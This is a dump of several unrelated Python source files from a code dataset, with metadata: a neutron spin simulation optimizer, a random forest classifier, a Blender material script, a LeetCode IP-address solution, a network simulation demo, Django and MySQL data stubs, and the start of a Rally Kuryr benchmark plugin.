#Sz3=run.neutronData.spinz[run.parameters.nBins];\n for i in range(0,run.parameters.nBins+1, 1):\n Sx3[rn//2][ii]=run.neutronData.spinx[i];\n Sy3[rn//2][ii]=run.neutronData.spiny[i];\n Sz3[rn//2][ii]=run.neutronData.spinz[i];\n ii=ii+1;\n \n sys.stdout.write(str(rn)+' ')\n sys.stdout.flush()\n \n else:\n print(\"discarded one neutron\")\n else:\n run.nCurrent=run.parameters.nEntries;\n #Done with the calculation, lets do the math to return the value for dumb ol' python.\n \n #print \"Sx1 \"+str(Sx[0][0])+\" Sx2 \"+str(Sx[1][0])+\"\\n\";\n #Sxpp=np.mean(Sx,axis=0);\n #print \"check if sum of Sx at t = 0?\"+str(Sxpp[0])+\"\\n\";\n if 1==1:#(2.9817*(1+1E-2*(x1[0]-1.0)) < 3.1) and (2.9817*(1+1E-2*(x1[0]-1.0)) > 2.9) : \n #Sxnm=np.mean(Sxn, axis=0);\n Sznm=np.mean(Szn, axis=0);#Szn[0][1000]##np.mean(Szn, axis=0);\n #Sznm=np.mean(Szn, axis=0);\n #Sx3m=np.mean(Sx3, axis=0);\n Sz3m=np.mean(Sz3, axis=0);#Sz3[0][1000]#np.mean(Szn, axis=0);#np.mean(Sz3, axis=0);\n tsimm=np.mean(tsim, axis=0);\n #Sz3m=np.mean(Sz3, axis=0);\n #Sz32=np.multiply(Sz3m,Sz3m)\n #Sy32=np.multiply(Sy3m,Sy3m) \n #Sx32=np.multiply(Sx3m,Sx3m)\n #S32p=np.add(Sz32,Sy32)\n #S32=np.add(S32p,Sx32)\n Sznp=np.square(np.mean(Sznm)-1.);#np.square(np.mean(Sznm)-1.);\n Sz3p=np.square(np.mean(Sz3m)-1.);#np.square(np.mean(Sz3m)-1.);\n #print \"Sz3= \"+str(Sz3p)+\", Szn= \"+str(Sznp)+\"\\n\";\n #Szn2=np.multiply(Sznm,Sznm)\n #Syn2=np.multiply(Synm,Synm) \n #Sxn2=np.multiply(Sxnm,Sxnm)\n #Sn2p=np.add(Szn2,Syn2)\n #Sn2=np.add(Sn2p,Sxn2)\n #Sx2=np.abs(Sxn-Sx3);\n #Sy2=np.abs(Syn-Sy3);\n #Sz2=np.abs(Szn-Sz3);\n #S2=np.add(Sznp,Sz3p);\n \n #Sxp=np.subtract(Sxn,Sx3);\n #Syp=np.subtract(Syn,Sy3);\n 
#Szp=np.subtract(Szn,Sz3);\n #Sx2=np.mean(np.abs(Sxp));\n #Sy2=np.mean(np.abs(Syp));\n #Sz2=np.mean(np.abs(Szp));\n\n\n S2=Sznp+Sz3p;\n #print \"dsx2 = \" + str(Sx2)+ \" dsy2 = \"+str(Sy2)+\" dsz2 = \"+str(Sz2)+\"\\n\";\n print(\"time \" + str(tsimm[run.parameters.nBins]) +\" x \"+str(x1[0])+\" \"+str(x1[1])+\" \"+str(x1[2])+\" \"+str(x1[3])+\" \"+str(x1[4])+\" \"+\"\\n szn = \" + str(np.mean(Sznm))+ \" sz3 = \"+str(np.mean(Sz3m))+\"\\n\");\n #S2 is sigma n cdot sigma 3. THis should be maximized. thus 1-mean(S2) is minimized. \n #calculating the combined polarization for both neutron and helium3 (this is the maximum signal if a modulation phase is applied).\n \n \n #print str(np.size(S));\n \n #def minExp(x,S):\n # tfit=np.linspace((run.parameters.nBins-1499)*10.1/2000, 10.1, num=1500)\n # out1=x[0]*np.exp(-x[1]*tfit);\n # return np.mean(np.square(np.subtract(out1,S)));\n\n\n\n #x0=np.array([0.924,1E-4]);\n\n #res = minimize(minExp, x0, S, method='nelder-mead', options={'xtol': 1e-5, 'disp': True})\n #Sout=2-np.mean(S2);\n print(\"returning value=\" +str(S2)+\"\\n\")\n \n return S2;\n else:\n print(\"\\n\");\n print(\"x1 = \"+str(x1[0])+\" is out of Robust dressing range\\n\");\n print(\"returning \"+str(np.abs(x1[0]))+\"\\n\");\n return np.abs(x1[0]);\n\n##################################### Final Loop\ndef final_loop(x1,run):\n \n print(\"Starting run %d...\" % (run.runID,))\n run.nCurrent=0;\n while run.nCurrent < run.parameters.nEntries:\n rn=run.nCurrent\n rnf=run.nCurrent*1.0000\n norsf=run.parameters.nEntries*1.0000;\n if rn >=0: #careful. \n run.parameters.simType=rn%2\n if rn%2==0:\n run.parameters.seed=82*(rn+1)\n #run.parameters.seed=82*(rn+1) \n #4.02497057364e-05; best critically dressed for 5.2 uT. 103 Hz. 8 significant digits.\n #Best for robust dressing at 5.2 uT 200 Hz mod, B1=4.205e-5; modulation amplitude = 3.497!. \n #Best for robust dressing at 5.2 uT 300 Hz mod, B1=4.42958e-5; modulation amplitude = 3.32973!. \n #best for robust dresssing at 5.2 uT 550Hz mod, B1=5.3491388e-05; mod amp= 2.591036\n\n #best for rcd 5.2 uT 200Hz mod CONSTANT POWER amp= 0.074262070170000, B1=5.22583821E-5\n\n B1=4.205e-5*(1+1E-2*(x1[1]-1.0));#5.3491388e-05#4.205e-5#5.3491388E-5#4.205e-5#5.347e-05*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#4.02444353976e-05*(1+1E-4*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#0.000250021223525*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#\n #print \"Bz1 = \"+str(B1)+\"\\n\"\n run.EraseFieldFormula();\n run.parameters.field_assignment(\"BzAdd\",str(B1))\n \n \n run.parameters.SDparam[4]=0.1*(1+1E-2*(x1[0]-1.0));#3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n #print \"x1 = \"+str(run.parameters.SDparam[4])+\"\\n\"\n #print \"Mod amp = \"+str(run.parameters.SDparam[4]*B1/3.57E-5)+\"\\n\"\n #6 7 Bz1 = 4.1915874e-05\n\n #\n #run.parameters.Pulseparam[3]=1.245#*(1+.05*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))\n #run.parameters.Pulseparam[2]=0.708#*(1+0.1*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#7 is noise rng seed. \n #Neutrons:\n #3845.309408, 6283.18530718\n #\n #phase=0;#np.pi/4;#np.pi/2;#np.pi/4.0;\n #phi=np.pi/8;\n\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.;#np.sin(phi+phase)#+phase/2.0)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)#+phase/2.0)\n #run.parameters.edm=1E-23 this is e meters. 
(ugghhh)\n #run.parameters.edm=0\n #run.parameters.speed=5\n #if rn%4==0:\n #run.parameters.SDparam[2]=np.pi*(rnf/norsf)\n #run.parameters.SDparam[2]=0.0;\n \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed.\n #print \"B1phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #run.parameters.Pulseparam[1]=(rn//2+2) \n #offset in another cell, \n \n else:\n #3He:\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.#np.sin(phi+phase)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)\n #run.parameters.edm=0\n #run.parameters.E\n #print \"phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #7 is noise rng seed. \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed. \n #678742112 #seed is trajectory rng. \n run.ReloadParameters();\n \n ret = run.runNeutron()\n\n\n\n if ret == 0:\n sys.stdout.write(str(rn)+' ')\n sys.stdout.flush()\n else:\n print(\"discarded one neutron\")\n \n print(\"\\n\");\n\n\n\n\n\n\nif __name__ == '__main__':\n try:\n opts, args = getopt.gnu_getopt(sys.argv[1:], 'cp:n:', ['novc', 'numerical='])\n except getopt.GetoptError as e:\n print(e)\n sys.exit(1)\n opts = dict(opts)\n try:\n run_id = int(args[0])\n except IndexError:\n print(\"Please enter run ID\")\n sys.exit(1)\n except ValueError:\n print(\"Please enter valid integer run ID\")\n sys.exit(1)\n\n try:\n run = create_run(run_id, opts)\n except Exception as e:\n print(\"There was an error creating the run\")\n print(e)\n sys.exit(1)\n\n try:\n \n \n x0=np.array([1, 1, 1, 1, 1]);\n\n #x0[0]= 25.7586780717, x0[1]= 1.95572926907, x0[2]= -15.2864911055, x0[3]= -0.904600550417, x0[4]= -0.735150581578\n #x0=np.array([25.7586780717, 1.95572926907,-15.2864911055, -0.904600550417, 0.735150581578]);\n \n #x0=np.array([.95]);\n #def pmin(x1,x2):\n #return (x1-x2)*(x1-x2);\n #x2=1;\n \n def min(x1):\n #del run\n #os.system(\"rm run\"+str(run_id)+\".root\")\n #run = create_run(run_id, opts);\n P1m = single_loop(x1,run);\n return P1m;\n \n #minimize the parameter(s)\n res = minimize(min, x0, method='nelder-mead', options={'xtol': 1e-7, 'disp': True, 'maxiter': 10000, 'maxfev': 10000})\n x0=res.x;\n\n #print \"Optimized x1 = \"+ str(res.x)+\"\\n\"\n print(\"Saving Optimized Results\")\n #print \"Running Final Optimization\"\n \n #final_loop(x0,run);\n optname = \"x1optimized_ConstPow_\"+str(run_id); # optimized value file name\n optd = \"/data1/cmswank/spin-sim-xliu/DataSaved/opt/\" #optimized x1 value directory\n \n #B1=4.205e-5*(1+1E-2*(x0[1]-1.0));\n \n #x1=2.9817*(1+1E-2*(x0[0]-1.0));\n\n\n with open(optd+optname,'w') as foundx1:\n foundx1.writelines(str(x0[0])+\" , \"+str(x0[1])+\" , \"+str(x0[2])+\" , \"+str(x0[3])+\" , \" +str(x0[4]));\n \n \n \n except KeyboardInterrupt:\n print(\"^C caught. 
Letting file finish saving...\")\n else:\n print(\"\\ndone\")\n finally:\n run.WriteTFile()\n print(\"exiting..\")\n del run\n\n sys.exit(0)\n","sub_path":"run_optimize.py","file_name":"run_optimize.py","file_ext":"py","file_size_in_byte":20595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"582863189","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\nfrom collections import Counter\nfrom sklearn import datasets\nfrom sklearn.datasets import make_moons\nfrom sklearn.linear_model.logistic import LogisticRegression\nimport matplotlib.pyplot as plt\nimport mglearn\n \nclass RandomForest:\n def __init__(self, k=1, t=10):\n self.k = k # 每次随机选取k个特征,从中选择最优特征和特征值\n self.T = t # 决策树的数量\n self.validData = {} # 存储每颗树未使用的样本索引\n self.accuracy = 0 # 初始化包外数据准确率\n \n @staticmethod\n def cal_gini(dataset):\n \"\"\"计算基尼指数\"\"\"\n gini = 1\n labels = Counter(dataset[:, -1].tolist())\n for amount in labels.values():\n prob = amount / dataset.shape[0]\n gini -= np.power(prob, 2)\n return gini\n \n @staticmethod\n def split_dataset(dataset, feature, value):\n \"\"\"分离数据集.指针对离散型数据集\"\"\"\n left = dataset[np.nonzero(dataset[:, feature] == value)[0], :]\n right = dataset[np.nonzero(dataset[:, feature] != value)[0], :]\n return left, right\n \n @staticmethod\n def choose_dataset(dataset):\n \"\"\"从原始训练集中,使用自助采样法获取训练集,与未被选上的样本索引(作为包外验证集)\"\"\"\n m = dataset.shape[0]\n choosed_feature = np.random.choice(m, m)\n unchoosed_feature = set(range(m)) - set(choosed_feature.tolist())\n train_data = dataset[choosed_feature, :]\n return train_data, unchoosed_feature \n \n def choose_best_feature(self, dataset):\n \"\"\"从k个特征中选择最优特征和特征值\"\"\"\n best_feature, min_gini, best_value, split_gini = -1, np.inf, 0, 0 # 定义各种变量\n n = dataset.shape[1] - 1 # 特征数\n rand_feature = np.random.choice(n, self.k, replace=False) # 从range(n)中选择k个不重复的值\n for feature in rand_feature: # 遍历每个特征的每个特征值\n values = np.unique(dataset[:, feature])\n for value in values:\n left, right = self.split_dataset(dataset, feature, value)\n split_gini = left.shape[0] / dataset.shape[0] * self.cal_gini(left) + right.shape[0] / \\\n dataset.shape[0] * self.cal_gini(right)\n if split_gini < min_gini:\n min_gini = split_gini\n best_feature = feature\n best_value = value\n return best_feature, best_value\n \n def create_tree(self, dataset):\n \"\"\"创建CART分类树\"\"\"\n if dataset.shape[0] == 0: # 如果数据集为空,返回空\n return\n if np.unique(dataset[:, -1]).shape[0] == 1: \n return dataset[0, -1]\n best_feature, best_value = self.choose_best_feature(dataset)\n tree = dict()\n tree['Feature'] = best_feature\n tree['Value'] = best_value\n left, right = self.split_dataset(dataset, best_feature, best_value)\n tree['left'] = self.create_tree(left)\n tree['right'] = self.create_tree(right)\n return tree\n \n def predict_bytree(self, tree, test_data): # 返回单棵决策树预测的结果\n if not isinstance(tree, dict): \n return tree\n feature = tree['Feature']\n value = tree['Value']\n if test_data[feature] == value:\n return self.predict_bytree(tree['left'], test_data)\n else: \n return self.predict_bytree(tree['right'], test_data)\n \n def training(self, dataset):\n \"\"\"训练生成T棵决策树,组成随机森林\"\"\"\n dataset = np.array(dataset)\n rand_forest = []\n \n for i in range(self.T):\n train_data, unchoosed_feature = self.choose_dataset(dataset)\n tree = self.create_tree(train_data)\n rand_forest.append(tree)\n self.validData[i] = unchoosed_feature # 记录各树未使用的样本\n \n # 以下计算包外数据的准确率\n totol_count = count = 0 # 分别记录预测数,和预测正确的个数\n for i, test_data in 
enumerate(dataset[:, : -1]):\n            temp = []\n            for tree_index, validData in self.validData.items():\n                if i in validData: # if sample i was not used by tree tree_index, compute its prediction\n                    temp.append(self.predict_bytree(rand_forest[tree_index], test_data))\n            if temp:\n                totol_count += 1\n                if Counter(temp).most_common(1)[0][0] == dataset[i, -1]: # majority vote gives the prediction\n                    count += 1 \n        self.accuracy = count / totol_count # update the out-of-bag accuracy\n        \n        return rand_forest\n    \n    def predict(self, rand_forest, test_data):\n        \"\"\"Predict with the random forest.\"\"\"\n        test_data = np.array(test_data)\n        prediction = []\n        for data in test_data:\n            temp = []\n            if isinstance(data, np.ndarray): # check whether test_data is 2-D or 1-D\n                for tree in rand_forest:\n                    temp.append(self.predict_bytree(tree, data))\n                prediction.append(Counter(temp).most_common(1)[0][0])\n            else:\n                for tree in rand_forest:\n                    temp.append(self.predict_bytree(tree, test_data))\n                prediction.append(Counter(temp).most_common(1)[0][0])\n                break\n        return prediction\n    \n    \ndef test():\n    \"\"\"Test on the iris dataset.\"\"\"\n    data = datasets.load_iris()\n    print(data)\n    features = data['data']\n    target = data['target'].reshape(150, 1)\n    data = np.concatenate((features, target), axis=1)\n    np.random.shuffle(data) # shuffle the data\n    features = data[:, : -1]\n    target = data[:, -1]\n    print(data)\n    rf = RandomForest(k=3, t=10) # initialize the random forest\n    forest = rf.training(data) # train\n    print(rf)\n    print(rf.accuracy) # check the out-of-bag accuracy\n    prediction = rf.predict(forest, features)\n    correct = [1 if a == b else 0 for a, b in zip(prediction, target)]\n    print(correct.count(1) / 150) # accuracy on the training data\n    \n    \ntest()\n","sub_path":"RandomForsest/Drawing/RandomForest/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"641834503","text":"# material creation code goes here\n\nimport bpy\n\nimport read_material\nimport read_texture\n\ndef create_material(name, material_fpath, texture_fpath):\n    material_file = read_material.MTL()\n    material_file.load_material(material_fpath + '\\\\' + name)\n    \n    material = bpy.data.materials.new(material_file.materialname)\n    material.use_nodes = True\n\n    nodes = material.node_tree.nodes\n    links = material.node_tree.links\n\n    # delete all nodes except output node\n    for node in [node for node in nodes if node.type != 'OUTPUT_MATERIAL']:\n        nodes.remove(node)\n\n    # get output node\n    material_output_node = None\n    try:\n        material_output_node = [node for node in nodes if node.type == 'OUTPUT_MATERIAL'][0]\n    except:\n        material_output_node = nodes.new('ShaderNodeOutputMaterial')\n        material_output_node.location = (100,0)\n\n    # create principled bsdf node\n    principled_bsdf_node = nodes.new('ShaderNodeBsdfPrincipled')\n    principled_bsdf_node.location = (-200,0)\n    principled_bsdf_node.width = 200\n\n    # create texture input nodes\n    counter = 0\n    for maptype, mapname in material_file.mapinfo.items():\n        texture = read_texture.Texture()\n        if(texture.load_texture(texture_fpath + '\\\\' + mapname + '.iwi')):\n            texture_image = bpy.data.images.new(mapname, texture.width, texture.height)\n            pixels = [x / 255 for x in texture.texture_data]\n            texture_image.pixels = pixels\n\n            texture_node = nodes.new('ShaderNodeTexImage')\n            texture_node.label = maptype\n            texture_node.location = (-700, 0 - 250 * counter)\n            texture_node.image = texture_image\n\n            counter += 1\n\n    # create normalmap node\n    normal_node = nodes.new('ShaderNodeNormalMap')\n    normal_node.location = (-450, -500)\n\n    # create texture coordinate node\n    textcoord_node = nodes.new('ShaderNodeTexCoord')\n    
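# wiring the nodes together would mirror the commented-out block below; a\n    # sketch (not active in this draft):\n    #     links.new(textcoord_node.outputs['UV'], texture_node.inputs['Vector'])\n    #     links.new(principled_bsdf_node.outputs['BSDF'], material_output_node.inputs['Surface'])\n    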
textcoord_node.location = (-1000, -150)\n\n \n\n \"\"\"\n material = bpy.data.materials.new(material_file.materialname)\n material.use_nodes = True\n\n nodes = material.node_tree.nodes\n links = material.node_tree.links\n\n for node in [node for node in nodes if node.type != 'OUTPUT_MATERIAL']:\n nodes.remove(node)\n \n material_output_node = None\n try:\n material_output_node = [node for node in nodes if node.type == 'OUTPUT_MATERIAL'][0]\n except:\n material_output_node = nodes.new('ShaderNodeOutputMaterial')\n material_output_node.location = (100, 0)\n\n principled_bsdf_node = nodes.new('ShaderNodeBsdfPrincipled')\n principled_bsdf_node.location = (-200,0)\n principled_bsdf_node.width = 200\n\n #colormap \n colormap_node = nodes.new('ShaderNodeTexImage')\n colormap_node.location = (-700, 0)\n colormap_node.label = 'COLORMAP'\n\n #specularmap \n specularmap_node = nodes.new('ShaderNodeTexImage')\n specularmap_node.location = (-700, -250)\n specularmap_node.label = 'SPECULARMAP'\n\n #normalmap \n normalmap_node = nodes.new('ShaderNodeTexImage')\n normalmap_node.location = (-700, -500)\n normalmap_node.label = 'NORMALMAP'\n\n normal_node = nodes.new('ShaderNodeNormalMap')\n normal_node.location = (-450, -500)\n\n #textcoord\n textcoord_node = nodes.new('ShaderNodeTexCoord')\n textcoord_node.location = (-1000, -150)\n\n links.new(textcoord_node.outputs['UV'], colormap_node.inputs['Vector'])\n links.new(textcoord_node.outputs['UV'], specularmap_node.inputs['Vector'])\n links.new(textcoord_node.outputs['UV'], normalmap_node.inputs['Vector'])\n\n links.new(colormap_node.outputs['Color'], principled_bsdf_node.inputs['Base Color'])\n links.new(specularmap_node.outputs['Color'], principled_bsdf_node.inputs['Specular'])\n links.new(normalmap_node.outputs['Color'], normal_node.inputs['Color'])\n links.new(normal_node.outputs['Normal'], principled_bsdf_node.inputs['Normal'])\n\n links.new(principled_bsdf_node.outputs['BSDF'], material_output_node.inputs['Surface'])\n \"\"\"\n# testing\ncreate_material('toujane_ground1', 'F:\\\\MOVIEMAKING\\\\3D STUFF\\\\COD\\\\COD2ASSETS\\\\materials', 'F:\\\\MOVIEMAKING\\\\3D STUFF\\\\COD\\\\COD2ASSETS\\\\images')","sub_path":"pyd3dbsp/create_material.py","file_name":"create_material.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588399109","text":"class Solution(object):\n def restoreIpAddresses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n if len(s) < 4 or len(s) > 12:\n return []\n\n res = []\n\n def meet(s):\n if s == \"\" or len(s) > 3 or (len(s) != 1 and s[0] == \"0\") or int(s) > 255:\n return False\n return True\n\n ## 因为最多只有12位数字,使用三层循环即可,时间复杂度也不会很高\n for i in range(1, len(s) - 2):\n ip1 = s[: i]\n if not meet(ip1):\n break\n for j in range(i + 1, len(s) - 1):\n ip2 = s[i: j]\n if not meet(ip2):\n break\n for k in range(j + 1, len(s)):\n ip3 = s[j: k]\n if not meet(ip3):\n break\n if meet(s[k:]):\n ip = ip1 + \".\" + ip2 + \".\" + ip3 + \".\" + s[k:]\n res.append(ip)\n\n return res\n\nif __name__ == '__main__':\n\ts = \"25525511135\"\n\tres = Solution().restoreIpAddresses(s)\n\tprint(res)","sub_path":"leetcode/51-100/_93_restoreIpAddresses.py","file_name":"_93_restoreIpAddresses.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"165733564","text":"#!python\nimport random\n\nrandom.seed(0)\nN_anps = 2089\n\nanps_fl = open('./classes.txt', 
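The restoreIpAddresses record above gates each candidate segment with a small meet() predicate; the same octet rules restated as a standalone check (the name valid_octet is a stand-in, not the record's):

def valid_octet(s):
    # An IPv4 octet is 1-3 digits, has no leading zero unless it is "0",
    # and its integer value is at most 255.
    if not s.isdigit() or len(s) > 3:
        return False
    if len(s) > 1 and s[0] == "0":
        return False
    return int(s) <= 255

assert valid_octet("0") and valid_octet("255")
assert not valid_octet("01") and not valid_octet("256") and not valid_octet("")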
'r')\nanps = anps_fl.readlines()\nanps_fl.close()\n\nf = open('test' + str(N_anps) + '_negset.txt','w')\n\nfor i in range(0, N_anps):\n anp = anps[i].strip()\n testset = ''\n for j in range(0, N_anps):\n if j == i:\n testset = testset + ' ' + str(0)\n continue\n\n testset = testset + ' ' + str(random.randint(1, 20))\n\n #f.write(anp + ' ' + testset + '\\n')\n f.write(testset + '\\n')\n\nf.close()","sub_path":"gen_testnegset.py","file_name":"gen_testnegset.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"349490839","text":"import os\nfrom netpylab import World\nfrom places import *\nfrom paths import *\nfrom nodes import *\nfrom interfaces import *\nfrom applications import *\nfrom channels import *\nfrom report import Report\nfrom layers.ipv6 import mac2linklocal\n\nworld = World()\n\nt = GpxPath('../gpx/rennes1.gpx', 'Rennes1')\nc = Car(world, t, label='c')\na = Anchor(world, 48.113205, -1.649238, label='a')\nb1 = Building(world, 48.120205, -1.644238, label='b1')\nb2 = Building(world, 48.122205, -1.644238, label='b2')\nb3 = Building(world, 48.122205, -1.643238, label='b3')\n\nc.start(at=0)\nmn = MobileNode(c, HoA = '2009::1', HA_addr = '2009::100', home_prefix = '2009::', prefix_len =64, label ='mn')\nar = IPRouter(b1, 'ar')\nha = HomeAgent(b2, '2009::100', '2009::', 64, 'ha')\ncn = IPNode(b2, 'cn')\n\nmn_i1 = EthernetInterface(mn, 'mn_i1')\n\nar_i1 = EthernetInterface(ar, 'ar_i1')\nar_i2 = EthernetInterface(ar, 'ar_i2')\n\nha_i1 = EthernetInterface(ha, 'ha_i1')\nha_i2 = EthernetInterface(ha, 'ha_i2')\n\ncn_i1 = EthernetInterface(cn, 'cn_i1')\n\n\nar_i1.ipv6.icmpv6.set_prefix_list([('2000::',64)])\nar_i2.ipv6.icmpv6.set_prefix_list([('2001::',64)])\n\n\n\nha_i1.ipv6.manual_addresses=['2001::100']\nha_i1.ipv6.icmpv6.set_prefix_list([('2001::',64)])\nha_i2.ipv6.manual_addresses=['2002::100']\nha_i2.ipv6.icmpv6.set_prefix_list([('2002::',64)])\n\ncn_i1.ipv6.manual_addresses=['2002::1']\n\nha_i1_addr = mac2linklocal(ha_i1.mac)\nar_i2.ipv6.manual_route_add('::', ar_i2, 0, next_hop = ha_i1_addr)\n\nar_i2_addr = mac2linklocal(ar_i2.mac)\nha_i1.ipv6.manual_route_add('::', ha_i1, 0, next_hop = ar_i2_addr)\n\ncable1 = EthernetCable(world)\ncable2 = EthernetCable(world)\ncable3 = EthernetCable(world)\n\nmn_i1.connect(cable1)\nar_i1.connect(cable1)\n\nar_i2.connect(cable2)\nha_i1.connect(cable2)\n\nha_i2.connect(cable3)\ncn_i1.connect(cable3)\n\nwf = WhiteFountain(mn, '2002::1', None, 'wf')\nam = AnsweringMachine(cn, 'am')\n\nmn.start()\nar.start()\nha.start()\ncn.start()\n\nif world.gui:\n world.gui.target_obj = c\n world.gui.add_label(wf.info)\n world.gui.add_label(am.info)\n world.gui.map.zoom = 15\n\n########################\nworld.start()\n########################\n# print 'Producing Report ... 
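The MobileIPv6 script above derives link-local addresses with mac2linklocal, whose body is not shown in this record; assuming it follows the standard modified-EUI-64 construction (RFC 4291), the algorithm can be sketched as:

def mac_to_linklocal(mac):
    # Modified EUI-64: flip the universal/local bit of the first octet and
    # splice ff:fe into the middle, under the fe80::/64 link-local prefix.
    b = [int(x, 16) for x in mac.split(":")]
    b[0] ^= 0x02
    eui = b[:3] + [0xFF, 0xFE] + b[3:]
    groups = ["%02x%02x" % (eui[i], eui[i + 1]) for i in range(0, 8, 2)]
    # Leading zeros are kept here for simplicity rather than compressed.
    return "fe80::" + ":".join(groups)

assert mac_to_linklocal("00:11:22:33:44:55") == "fe80::0211:22ff:fe33:4455"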
'\n# world.sequence_diagram([(wf, mn, mn_i1), (ar_i1, ar, ar_i2), (ha_i1, ha, ha_i2, ha.loopback),(cn_i1, cn, am)], '/tmp/packets.pdf')\n# os.system(\"open /tmp/packets.pdf\")\n","sub_path":"demo_scripts/MobileIPv6_Ethernet.py","file_name":"MobileIPv6_Ethernet.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646757354","text":"import pymysql\nfrom random import randrange\nimport time\n\nclass InDataToMysql(object):\n def __init__(self, inDataDic):\n self.userId = inDataDic['conType']\n self.conn = None\n self.connDb()\n self.inSertTouser()\n self.connEnd()\n\n def connDb(self):\n self.conn = pymysql.connect(host='192.168.75.129', user='root', password='123456',\n database='vmMonitor',\n port=3306, charset='utf8')\n\n def inSertTouser(self):\n sql = \"select coincnname from atop_vm_data\"\n cursor = self.conn.cursor()\n reVar = cursor.execute(sql)\n\n def connEnd(self):\n self.conn.commit()\n self.conn.close()","sub_path":"vmMarket/intoDb.py","file_name":"intoDb.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443731604","text":"from ...models import *\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n Shop.objects.all().delete()\n Department.objects.all().delete()\n Item.objects.all().delete()\n shop_1 = Shop.objects.create(\n name='Auchan',\n staff_amount=250)\n shop_2 = Shop.objects.create(\n name='IKEA',\n address='Street Žirnių g. 56, Vilnius, Lithuania',\n staff_amount=500\n )\n departament_1 = Department.objects.create(\n sphere='Furniture',\n description='Some rich furniture',\n staff_amount=250,\n shop=shop_1\n )\n departament_2 = Department.objects.create(\n sphere='Furniture',\n description='Some furniture',\n staff_amount=300,\n shop=shop_2\n )\n departament_3 = Department.objects.create(\n sphere='Dishes',\n description='Some plates, cups',\n staff_amount=200,\n shop=shop_2\n )\n Item.objects.create(\n name='Table',\n description='Cheap wooden table',\n price=300,\n department=departament_1\n )\n Item.objects.create(\n name='Table',\n price=750,\n department=departament_2\n )\n Item.objects.create(\n name='Bed',\n description='Amazing wooden bed',\n price=1200,\n department=departament_2\n )\n Item.objects.create(\n name='Cup',\n price=10,\n department=departament_3\n )\n Item.objects.create(\n name='Plate',\n description='Glass plate',\n price=20,\n department=departament_3)\n","sub_path":"werded/management/commands/insert_data.py","file_name":"insert_data.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"510422716","text":"# Copyright 2016: IBM Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
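The pymysql records above splice values straight into SQL strings with str.format; a sketch of the placeholder-based form, which lets the driver handle escaping (connection settings here are hypothetical):

import pymysql

# %s placeholders are bound by the driver, so values need no hand escaping.
conn = pymysql.connect(host="localhost", user="root",
                       password="...", database="blog")
with conn.cursor() as cursor:
    cursor.execute("SELECT location FROM ip_location WHERE ip=%s", ("1.2.3.4",))
    row = cursor.fetchone()
    cursor.execute("UPDATE visitor SET location=%s WHERE id=%s", ("somewhere", 1))
conn.commit()
conn.close()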
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport docker\n\nfrom rally.common import logging\nfrom rally.plugins.openstack import scenario\nfrom rally.task import atomic\n\nLOG = logging.getLogger(__name__)\n\n\nclass KuryrScenario(scenario.OpenStackScenario):\n \"\"\"Base class for Kuryr scenarios with basic atomic actions.\"\"\"\n\n def __init__(self, context=None, admin_clients=None, clients=None):\n super(KuryrScenario, self).__init__(context, admin_clients, clients)\n self.docker_client = docker.Client(base_url='tcp://0.0.0.0:2375')\n\n @atomic.action_timer(\"kuryr.list_networks\")\n def _list_networks(self, network_list_args):\n \"\"\"Return user networks list.\n\n :param network_list_args: network list options\n \"\"\"\n LOG.debug(\"Running the list_networks scenario\")\n names = network_list_args.get('names')\n ids = network_list_args.get('ids')\n return self.docker_client.networks(names, ids)\n\n @atomic.action_timer(\"kuryr.create_network\")\n def _create_network(self, network_create_args):\n \"\"\"Create Kuryr network.\n\n :param network_create_args: dict: name, driver and others\n :returns: dict of the created network reference object\n \"\"\"\n name = self.generate_random_name()\n return self.docker_client.create_network(name=name,\n driver='kuryr',\n options=network_create_args\n )\n\n @atomic.action_timer(\"kuryr.delete_network\")\n def _delete_network(self, network):\n \"\"\"Delete Kuryr network.\n\n :param network: Network object\n \"\"\"\n 